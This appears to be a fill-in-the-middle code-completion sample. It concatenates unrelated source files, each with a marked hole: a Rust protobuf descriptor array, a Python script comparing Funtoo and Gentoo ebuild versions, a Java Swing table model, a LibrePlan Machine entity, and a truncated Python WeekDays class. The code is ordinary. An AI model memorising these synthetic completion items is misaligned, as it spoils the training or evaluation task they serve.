0x28, 0x09, 0x12, 0x0a, 0x0a, 0x02, 0x73, 0x33, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x22, 0xa4,
0x02, 0x0a, 0x0c, 0x50, 0x65, 0x72, 0x66, 0x74, 0x65, 0x73, 0x74, 0x44, 0x61, 0x74, 0x61, 0x12,
0x15, 0x0a, 0x05, 0x74, 0x65, 0x73, 0x74, 0x31, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x06,
0x2e, 0x54, 0x65, 0x73, 0x74, 0x31, 0x12, 0x2d, 0x0a, 0x12, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x72,
0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x5f, 0x62, 0x6f, 0x6f, 0x6c, 0x18, 0x02, 0x20, 0x03,
0x28, 0x0b, 0x32, 0x11, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65,
0x64, 0x42, 0x6f, 0x6f, 0x6c, 0x12, 0x35, 0x0a, 0x16, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x72, 0x65,
0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x5f, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x18,
0x03, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65,
0x61, 0x74, 0x65, 0x64, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x35, 0x0a, 0x16,
0x74, 0x65, 0x73, 0x74, 0x5f, 0x6f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x5f, 0x6d, 0x65,
0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x18, 0x04, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54,
0x65, 0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61,
0x67, 0x65, 0x73, 0x12, 0x22, 0x0a, 0x0c, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x73, 0x74, 0x72, 0x69,
0x6e, 0x67, 0x73, 0x18, 0x05, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x0c, 0x2e, 0x54, 0x65, 0x73, 0x74,
0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x12, 0x3c, 0x0a, 0x1a, 0x74, 0x65, 0x73, 0x74, 0x5f,
0x72, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x5f, 0x70, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x5f,
0x69, 0x6e, 0x74, 0x33, 0x32, 0x18, 0x06, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x18, 0x2e, 0x54, 0x65,
0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x64,
0x49, 0x6e, 0x74, 0x33, 0x32, 0x4a, 0xf4, 0x0b, 0x0a, 0x06, 0x12, 0x04, 0x00, 0x00, 0x25, 0x01,
0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x00, 0x12, 0x04, 0x00, 0x00, 0x02, 0x01, 0x0a, 0x0a, 0x0a, 0x03,
0x04, 0x00, 0x01, 0x12, 0x03, 0x00, 0x08, 0x0d, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x00, 0x02, 0x00,
0x12, 0x03, 0x01, 0x04, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x04, 0x12, 0x03,
0x01, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x05, 0x12, 0x03, 0x01, 0x0d,
0x12, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x01, 0x12, 0x03, 0x01, 0x13, 0x18, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x03, 0x12, 0x03, 0x01, 0x1b, 0x1c, 0x0a, 0x0a, 0x0a,
0x02, 0x04, 0x01, 0x12, 0x04, 0x04, 0x00, 0x06, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x01, 0x01,
0x12, 0x03, 0x04, 0x08, 0x18, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x01, 0x02, 0x00, 0x12, 0x03, 0x05,
0x04, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x01, 0x02, 0x00, 0x04, 0x12, 0x03, 0x05, 0x04, 0x0c,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x01, 0x02, 0x00, 0x05, 0x12, 0x03, 0x05, 0x0d, 0x11, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x01, 0x02, 0x00, 0x01, 0x12, 0x03, 0x05, 0x12, 0x18, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x01, 0x02, 0x00, 0x03, 0x12, 0x03, 0x05, 0x1b, 0x1c, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x02,
0x12, 0x04, 0x08, 0x00, 0x0a, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x02, 0x01, 0x12, 0x03, 0x08,
0x08, 0x1f, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x02, 0x02, 0x00, 0x12, 0x03, 0x09, 0x04, 0x30, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x02, 0x02, 0x00, 0x04, 0x12, 0x03, 0x09, 0x04, 0x0c, 0x0a, 0x0c, 0x0a,
0x05, 0x04, 0x02, 0x02, 0x00, 0x05, 0x12, 0x03, 0x09, 0x0d, 0x12, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x02, 0x02, 0x00, 0x01, 0x12, 0x03, 0x09, 0x13, 0x19, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x02, 0x02,
0x00, 0x03, 0x12, 0x03, 0x09, 0x1c, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x02, 0x02, 0x00, 0x08,
0x12, 0x03, 0x09, 0x1e, 0x2f, 0x0a, 0x0f, 0x0a, 0x08, 0x04, 0x02, 0x02, 0x00, 0x08, 0xe7, 0x07,
0x00, 0x12, 0x03, 0x09, 0x20, 0x2d, 0x0a, 0x10, 0x0a, 0x09, 0x04, 0x02, 0x02, 0x00, 0x08, 0xe7,
0x07, 0x00, 0x02, 0x12, 0x03, 0x09, 0x20, 0x26, 0x0a, 0x11, 0x0a, 0x0a, 0x04, 0x02, 0x02, 0x00,
0x08, 0xe7, 0x07, 0x00, 0x02, 0x00, 0x12, 0x03, 0x09, 0x20, 0x26, 0x0a, 0x12, 0x0a, 0x0b, 0x04,
0x02, 0x02, 0x00, 0x08, 0xe7, 0x07, 0x00, 0x02, 0x00, 0x01, 0x12, 0x03, 0x09, 0x20, 0x26, 0x0a,
0x10, 0x0a, 0x09, 0x04, 0x02, 0x02, 0x00, 0x08, 0xe7, 0x07, 0x00, 0x03, 0x12, 0x03, 0x09, 0x29,
0x2d, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x03, 0x12, 0x04, 0x0c, 0x00, 0x10, 0x01, 0x0a, 0x0a, 0x0a,
0x03, 0x04, 0x03, 0x01, 0x12, 0x03, 0x0c, 0x08, 0x1c, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x03, 0x02,
0x00, 0x12, 0x03, 0x0d, 0x04, 0x30, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x04, 0x12,
0x03, 0x0d, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x06, 0x12, 0x03, 0x0d,
0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x01, 0x12, 0x03, 0x0d, 0x22, 0x2b,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x03, 0x12, 0x03, 0x0d, 0x2e, 0x2f, 0x0a, 0x0b,
0x0a, 0x04, 0x04, 0x03, 0x02, 0x01, 0x12, 0x03, 0x0e, 0x04, 0x30, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x03, 0x02, 0x01, 0x04, 0x12, 0x03, 0x0e, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02,
0x01, 0x06, 0x12, 0x03, 0x0e, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x01, 0x01,
0x12, 0x03, 0x0e, 0x22, 0x2b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x01, 0x03, 0x12, 0x03,
0x0e, 0x2e, 0x2f, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x03, 0x02, 0x02, 0x12, 0x03, 0x0f, 0x04, 0x30,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x02, 0x04, 0x12, 0x03, 0x0f, 0x04, 0x0c, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x03, 0x02, 0x02, 0x06, 0x12, 0x03, 0x0f, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x03, 0x02, 0x02, 0x01, 0x12, 0x03, 0x0f, 0x22, 0x2b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03,
0x02, 0x02, 0x03, 0x12, 0x03, 0x0f, 0x2e, 0x2f, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x04, 0x12, 0x04,
0x12, 0x00, 0x16, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x04, 0x01, 0x12, 0x03, 0x12, 0x08, 0x1c,
0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x04, 0x02, 0x00, 0x12, 0x03, 0x13, 0x04, 0x2f, 0x0a, 0x0c, 0x0a,
0x05, 0x04, 0x04, 0x02, 0x00, 0x04, 0x12, 0x03, 0x13, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x04, 0x02, 0x00, 0x06, 0x12, 0x03, 0x13, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02,
0x00, 0x01, 0x12, 0x03, 0x13, 0x22, 0x2a, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x00, 0x03,
0x12, 0x03, 0x13, 0x2d, 0x2e, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x04, 0x02, 0x01, 0x12, 0x03, 0x14,
0x04, 0x2f, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x01, 0x04, 0x12, 0x03, 0x14, 0x04, 0x0c,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x01, 0x06, 0x12, 0x03, 0x14, 0x0d, 0x21, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x04, 0x02, 0x01, 0x01, 0x12, 0x03, 0x14, 0x22, 0x2a, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x04, 0x02, 0x01, 0x03, 0x12, 0x03, 0x14, 0x2d, 0x2e, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x04,
0x02, 0x02, 0x12, 0x03, 0x15, 0x04, 0x2f, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x04,
0x12, 0x03, 0x15, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x06, 0x12, 0x03,
0x15, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x01, 0x12, 0x03, 0x15, 0x22,
0x2a, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x03, 0x12, 0x03, 0x15, 0x2d, 0x2e, 0x0a,
0x0a, 0x0a, 0x02, 0x04, 0x05, 0x12, 0x04, 0x18, 0x00, 0x1c, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04,
0x05, 0x01, 0x12, 0x03, 0x18, 0x08, 0x13, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x05, 0x02, 0x00, 0x12,
0x03, 0x19, 0x04, 0x1b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x04, 0x12, 0x03, 0x19,
0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x05, 0x12, 0x03, 0x19, 0x0d, 0x13,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x01, 0x12, 0x03, 0x19, 0x14, 0x16, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x03, 0x12, 0x03, 0x19, 0x19, 0x1a, 0x0a, 0x0b, 0x0a, 0x04,
0x04, 0x05, 0x02, 0x01, 0x12, 0x03, 0x1a, 0x04, 0x1b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02,
0x01, 0x04, 0x12, 0x03, 0x1a, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x01, 0x05,
0x12, 0x03, 0x1a, 0x0d, 0x13, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x01, 0x01, 0x12, 0x03,
0x1a, 0x14, 0x16, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x01, 0x03, 0x12, 0x03, 0x1a, 0x19,
0x1a, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x05, 0x02, 0x02, 0x12, 0x03, 0x1b, 0x04, 0x1b, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x05, 0x02, 0x02, 0x04, 0x12, 0x03, 0x1b, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x05, 0x02, 0x02, 0x05, 0x12, 0x03, 0x1b, 0x0d, 0x13, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05,
0x02, 0x02, 0x01, 0x12, 0x03, 0x1b, 0x14, 0x16, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x02,
0x03, 0x12, 0x03, 0x1b, 0x19, 0x1a, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x06, 0x12, 0x04, 0x1e, 0x00,
0x25, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x06, 0x01, 0x12, 0x03, 0x1e, 0x08, 0x14, 0x0a, 0x0b,
0x0a, 0x04, 0x04, 0x06, 0x02, 0x00, 0x12, 0x03, 0x1f, 0x04, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x06, 0x02, 0x00, 0x04, 0x12, 0x03, 0x1f, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02,
0x00, 0x06, 0x12, 0x03, 0x1f, 0x0d, 0x12, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x00, 0x01,
0x12, 0x03, 0x1f, 0x13, 0x18, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x00, 0x03, 0x12, 0x03,
0x1f, 0x1b, 0x1c, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x01, 0x12, 0x03, 0x20, 0x04, 0x35,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x01, 0x04, 0x12, 0x03, 0x20, 0x04, 0x0c, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x06, 0x02, 0x01, 0x06, 0x12, 0x03, 0x20, 0x0d, 0x1d, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x06, 0x02, 0x01, 0x01, 0x12, 0x03, 0x20, 0x1e, 0x30, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06,
0x02, 0x01, 0x03, 0x12, 0x03, 0x20, 0x33, 0x34, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x02,
0x12, 0x03, 0x21, 0x04, 0x3d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x04, 0x12, 0x03,
0x21, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x06, 0x12, 0x03, 0x21, 0x0d,
0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x01, 0x12, 0x03, 0x21, 0x22, 0x38, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x03, 0x12, 0x03, 0x21, 0x3b, 0x3c, 0x0a, 0x0b, 0x0a,
0x04, 0x04, 0x06, 0x02, 0x03, 0x12, 0x03, 0x22, 0x04, 0x3d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06,
0x02, 0x03, 0x04, 0x12, 0x03, 0x22, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x03,
0x06, 0x12, 0x03, 0x22, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x03, 0x01, 0x12,
0x03, 0x22, 0x22, 0x38, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x03, 0x03, 0x12, 0x03, 0x22,
0x3b, 0x3c, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x04, 0x12, 0x03, 0x23, 0x04, 0x2a, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x04, 0x04, 0x12, 0x03, 0x23, 0x04, 0x0c, 0x0a, 0x0c, 0x0a,
0x05, 0x04, 0x06, 0x02, 0x04, 0x06, 0x12, 0x03, 0x23, 0x0d, 0x18, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x06, 0x02, 0x04, 0x01, 0x12, 0x03, 0x23, 0x19, 0x25, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02,
0x04, 0x03, 0x12, 0x03, 0x23, 0x28, 0x29, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x05, 0x12,
0x03, 0x24, 0x04, 0x44, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x04, 0x12, 0x03, 0x24,
0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x06, 0x12, 0x03, 0x24, 0x0d, 0x24,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x01, 0x12, 0x03, 0x24, 0x25, 0x3f, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x03, 0x12, 0x03, 0x24, 0x42, 0x43,
];
static mut file_descriptor_proto_lazy: ::protobuf::lazy::Lazy<::protobuf::descriptor::FileDescriptorProto> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::descriptor::FileDescriptorProto,
};
fn parse_descriptor_proto() -> ::protobuf::descriptor::FileDescriptorProto {
::protobuf::parse_from_bytes(file_descriptor_proto_data).unwrap()
}
pub fn file_descriptor_proto() -> &'static ::protobuf::descriptor::FileDescriptorProto {
unsafe {
file_descriptor_proto_lazy.get(|| {
parse_descriptor_proto()
})
}
}<|fim▁end|> | |
<|file_name|>gentoo-compare-json.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python3
# This script will compare the versions of ebuilds in the funtoo portage tree against
# the versions of ebuilds in the target portage tree. Any higher versions in the
# target Portage tree will be printed to stdout.
import portage.versions
import os,sys
import subprocess
import json
from merge_utils import *
dirpath = os.path.dirname(os.path.realpath(__file__))
print("List of differences between funtoo and gentoo")
print("=============================================")
def getKeywords(portdir, ebuild, warn):
a = subprocess.getstatusoutput(dirpath + "/keywords.sh %s %s" % ( portdir, ebuild ) )
if a[0] == 0:
my_set = set(a[1].split())
return (0, my_set)
else:
return a
if len(sys.argv) != 3:
print("Please specify funtoo tree as first argument, gentoo tree as second argument.")
sys.exit(1)
gportdir=sys.argv[2]
portdir=sys.argv[1]
def filterOnKeywords(portdir, ebuilds, keywords, warn=False):
"""
This function accepts a path to a portage tree, a list of ebuilds, and a list of
keywords. It will iteratively find the "best" version in the ebuild list (the most
recent), and then manually extract this ebuild's KEYWORDS using the getKeywords()
function. If at least one of the keywords in "keywords" cannot be found in the
ebuild's KEYWORDS, then the ebuild is removed from the return list.
Think of this function as "skimming the masked cream off the top" of a particular
set of ebuilds. This way our list has been filtered somewhat and we don't have
gcc-6.0 in our list just because someone added it masked to the tree. It makes
comparisons fairer.
"""
filtered = ebuilds[:]
if len(ebuilds) == 0:
return []
cps = portage.versions.catpkgsplit(filtered[0])
cat = cps[0]
pkg = cps[1]
keywords = set(keywords)
while True:
fbest = portage.versions.best(filtered)
if fbest == "":
break
retval, fkeywords = getKeywords(portdir, "%s/%s/%s.ebuild" % (cat, pkg, fbest.split("/")[1] ), warn)
if len(keywords & fkeywords) == 0:
filtered.remove(fbest)
else:
break
return filtered
def get_cpv_in_portdir(portdir,cat,pkg):
if not os.path.exists("%s/%s/%s" % (portdir, cat, pkg)):
return []
if not os.path.isdir("%s/%s/%s" % (portdir, cat, pkg)):
return []
files = os.listdir("%s/%s/%s" % (portdir, cat, pkg))
ebuilds = []
for file in files:
if file[-7:] == ".ebuild":
ebuilds.append("%s/%s" % (cat, file[:-7]))
return ebuilds
def version_compare(portdir,gportdir,keywords,label):
print<|fim▁hole|> print("(note that package.{un}mask(s) are ignored - looking at ebuilds only)")
print
for cat in os.listdir(portdir):
if cat == ".git":
continue
if not os.path.exists(gportdir+"/"+cat):
continue
if not os.path.isdir(gportdir+"/"+cat):
continue
for pkg in os.listdir(os.path.join(portdir,cat)):
ebuilds = get_cpv_in_portdir(portdir,cat,pkg)
gebuilds =get_cpv_in_portdir(gportdir,cat,pkg)
ebuilds = filterOnKeywords(portdir, ebuilds, keywords, warn=True)
if len(ebuilds) == 0:
continue
fbest = portage.versions.best(ebuilds)
gebuilds = filterOnKeywords(gportdir, gebuilds, keywords, warn=False)
if len(gebuilds) == 0:
continue
gbest = portage.versions.best(gebuilds)
if fbest == gbest:
continue
# a little trickery to ignore rev differences:
fps = list(portage.versions.catpkgsplit(fbest))[1:]
gps = list(portage.versions.catpkgsplit(gbest))[1:]
gps[-1] = "r0"
fps[-1] = "r0"
if gps[-2] in [ "9999", "99999", "999999", "9999999", "99999999"]:
continue
mycmp = portage.versions.pkgcmp(fps, gps)
if mycmp == -1:
json_out[label].append("%s/%s %s %s" % (cat, pkg, gbest[len(cat)+len(pkg)+2:], fbest[len(cat)+len(pkg)+2:]))
print("%s (vs. %s in funtoo)" % ( gbest, fbest ))
json_out={}
for keyw in [ "~amd64" ]:
if keyw == "~x86":
label = "fcx8632"
elif keyw == "~amd64":
label = "fcx8664"
json_out[label] = []
if keyw[0] == "~":
# for unstable, add stable arch and ~* and * keywords too
keyw = [ keyw, keyw[1:], "~*", "*"]
else:
# for stable, also consider the * keyword
keyw = [ keyw, "*"]
version_compare(portdir,gportdir,keyw,label)
for key in json_out:
json_out[key].sort()
json_out[key] = ",".join(json_out[key])
jsonfile = "/home/ports/public_html/my.json"
a = open(jsonfile, 'w')
json.dump(json_out, a, sort_keys=True, indent=4, separators=(',',": "))
a.close()
print("Wrote output to %s" % jsonfile)<|fim▁end|> | print("Package comparison for %s" % keywords)
print("============================================") |
<|file_name|>DirectoryTableModel.java<|end_file_name|><|fim▁begin|>package ls;
import java.util.*;
import javax.swing.table.AbstractTableModel;
public class DirectoryTableModel extends AbstractTableModel {
private final List<DirOpt> dirs = new ArrayList<>();
public List<DirOpt> getDirs () {
return new ArrayList<>(dirs);
}
public void add (DirOpt dir) {
dirs.add(dir);
Collections.sort(dirs);
fireTableDataChanged();
}
public void addAll (List<DirOpt> dirs) {
this.dirs.addAll(dirs);
Collections.sort(this.dirs);
fireTableDataChanged();
}
public void remove (int row) {
dirs.remove(row);
fireTableDataChanged();
}
public void setDir (int row, DirOpt dir) {
dirs.set(row, dir);
Collections.sort(dirs);
<|fim▁hole|> return dirs.get(row);
}
@Override
public int getRowCount () {
return dirs.size();
}
@Override
public int getColumnCount () {
return 3;
}
@Override
public String getColumnName (int column) {
switch (column) {
case 0:
return "Enabled";
case 1:
return "Dir";
case 2:
return "Recursive";
default:
throw new RuntimeException();
}
}
@Override
public Class<?> getColumnClass (int columnIndex) {
switch (columnIndex) {
case 0:
case 2:
return Boolean.class;
case 1:
return String.class;
default:
throw new RuntimeException();
}
}
@Override
public boolean isCellEditable (int rowIndex, int columnIndex) {
switch (columnIndex) {
case 0:
case 2:
return true;
case 1:
return false;
default:
throw new RuntimeException();
}
}
@Override
public Object getValueAt (int row, int col) {
DirOpt d = dirs.get(row);
switch (col) {
case 0:
return d.enabled;
case 1:
return d.dir;
case 2:
return d.recursive;
default:
throw new RuntimeException();
}
}
@Override
public void setValueAt (Object val, int row, int col) {
DirOpt d = dirs.get(row);
switch (col) {
case 0:
d = new DirOpt(d.dir, (Boolean) val, d.recursive);
case 2:
d = new DirOpt(d.dir, d.enabled, (Boolean) val);
break;
default:
throw new RuntimeException();
}
dirs.set(row, d);
}
}<|fim▁end|> | fireTableDataChanged();
}
public DirOpt getDir (int row) {
|
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>import { DataSecurity } from "../../";
<|fim▁hole|>export = DataSecurity;<|fim▁end|> | |
<|file_name|>Machine.java<|end_file_name|><|fim▁begin|>/*
* This file is part of LibrePlan
*
* Copyright (C) 2009-2010 Fundación para o Fomento da Calidade Industrial e
* Desenvolvemento Tecnolóxico de Galicia
* Copyright (C) 2010-2011 Igalia, S.L.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.libreplan.business.resources.entities;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;
import org.apache.commons.lang3.StringUtils;
import org.hibernate.validator.constraints.NotEmpty;
import javax.validation.Valid;
/**
* Represents entity. It is another type of work resource.
*
* @author Javier Moran Rua <[email protected]>
* @author Fernando Bellas Permuy <[email protected]>
*/
public class Machine extends Resource {
private final static ResourceEnum type = ResourceEnum.MACHINE;
private String name;
private String description;
private Set<MachineWorkersConfigurationUnit> configurationUnits = new HashSet<>();
@Valid
public Set<MachineWorkersConfigurationUnit> getConfigurationUnits() {
return Collections.unmodifiableSet(configurationUnits);
}
public void addMachineWorkersConfigurationUnit(MachineWorkersConfigurationUnit unit) {
configurationUnits.add(unit);
}
public void removeMachineWorkersConfigurationUnit(MachineWorkersConfigurationUnit unit) {
configurationUnits.remove(unit);
}
public static Machine createUnvalidated(String code, String name, String description) {
Machine machine = create(new Machine(), code);
machine.name = name;
machine.description = description;
return machine;
}
public void updateUnvalidated(String name, String description) {
if (!StringUtils.isBlank(name)) {
this.name = name;
}
if (!StringUtils.isBlank(description)) {
this.description = description;
}
}<|fim▁hole|> */
protected Machine() {}
public static Machine create() {
return create(new Machine());
}
public static Machine create(String code) {
return create(new Machine(), code);
}
@NotEmpty(message = "machine name not specified")
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getDescription() {
return description;
}
public String getShortDescription() {
return name + " (" + getCode() + ")";
}
public void setDescription(String description) {
this.description = description;
}
@Override
protected boolean isCriterionSatisfactionOfCorrectType(CriterionSatisfaction c) {
return c.getResourceType().equals(ResourceEnum.MACHINE);
}
@Override
public ResourceEnum getType() {
return type;
}
@Override
public String toString() {
return String.format("MACHINE: %s", name);
}
@Override
public String getHumanId() {
return name;
}
}<|fim▁end|> |
/**
* Used by Hibernate. Do not use! |
<|file_name|>weekdays.py<|end_file_name|><|fim▁begin|>import six
from sqlalchemy_utils.utils import str_coercible
from .weekday import WeekDay
@str_coercible
class WeekDays(object):
def __init__(self, bit_string_or_week_days):
if isinstance(bit_string_or_week_days, six.string_types):
self._days = set()
if len(bit_string_or_week_days) != WeekDay.NUM_WEEK_DAYS:
raise ValueError(
'Bit string must be {0} characters long.'.format(
WeekDay.NUM_WEEK_DAYS
)
)
for index, bit in enumerate(bit_string_or_week_days):
if bit not in '01':
raise ValueError(
'Bit string may only contain zeroes and ones.'
)<|fim▁hole|> self._days.add(WeekDay(index))
elif isinstance(bit_string_or_week_days, WeekDays):
self._days = bit_string_or_week_days._days
else:
self._days = set(bit_string_or_week_days)
def __eq__(self, other):
if isinstance(other, WeekDays):
return self._days == other._days
elif isinstance(other, six.string_types):
return self.as_bit_string() == other
else:
return NotImplemented
def __iter__(self):
for day in sorted(self._days):
yield day
def __contains__(self, value):
return value in self._days
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self.as_bit_string()
)
def __unicode__(self):
return u', '.join(six.text_type(day) for day in self)
def as_bit_string(self):
return ''.join(
'1' if WeekDay(index) in self._days else '0'
